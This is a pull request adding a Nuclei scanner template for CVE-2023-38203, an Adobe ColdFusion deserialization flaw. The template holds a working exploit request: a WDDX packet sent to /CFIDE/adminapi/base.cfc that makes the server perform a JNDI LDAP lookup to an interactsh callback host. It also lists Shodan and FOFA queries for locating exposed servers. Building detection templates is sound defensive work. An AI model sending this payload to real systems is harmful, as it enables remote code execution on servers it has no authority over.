### PR TITLE
Create CVE-2023-38203.yaml

### DIFF
--- a/http/cves/2023/CVE-2023-38203.yaml
+++ b/http/cves/2023/CVE-2023-38203.yaml
@@ -1,0 +1,47 @@
+id: CVE-2023-38203
+
+info:
+  name: Adobe ColdFusion Deserialization of Untrusted Data Vulnerability
+  author: yiran
+  severity: critical
+  description: |
+    Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
+  remediation: |
+    Upgrade to Adobe ColdFusion version ColdFusion 2018 Update 18, ColdFusion 2021 Update 8, ColdFusion 2023 Update2 or later to mitigate this vulnerability.
+  reference:
+    - https://blog.projectdiscovery.io/adobe-coldfusion-rce/
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-38203
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-38203
+    cwe-id: CWE-502
+    cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 1
+    vendor: adobe
+    product: coldfusion
+    shodan-query: http.component:"Adobe ColdFusion"
+    fofa-query: app="Adobe-ColdFusion"
+  tags: cve,cve2023,adobe,rce,coldfusion,deserialization,kev
+variables:
+  callback: "{{interactsh-url}}"
+  jndi: "ldap%3a//{{callback}}/zdfzfd"
+
+http:
+  - raw:
+      - |
+        POST /CFIDE/adminapi/base.cfc?method= HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        argumentCollection=<wddxPacket+version%3d'1.0'><header/><data><struct+type%3d'xcom.sun.rowset.JdbcRowSetImplx'><var+name%3d'dataSourceName'><string>{{jndi}}</string></var><var+name%3d'autoCommit'><boolean+value%3d'true'/></var></struct></data></wddxPacket>
+
+    matchers:
+      - type: dsl
+        dsl:
+          - contains(interactsh_protocol, "dns")
+          - contains(body, "ColdFusion documentation")
+        condition: and


### PR DESCRIPTION
It's an update for CVE-2023-29300, for different adobe coldfusion version with different vulnerable path. I have tested it on my target machine

### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Added CVE-2023-38203 
- References:
   https://nvd.nist.gov/vuln/detail/CVE-2023-38203
   https://blog.projectdiscovery.io/adobe-coldfusion-rce/
   https://threatprotect.qualys.com/2023/07/18/adobe-coldfusion-vulnerabilities-exploited-in-the-attacks-in-dropping-webshell-cve-2023-29298-cve-2023-29300-and-cve-2023-38203/

### Template Validation

I've validated this template locally?
- [ ✓] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)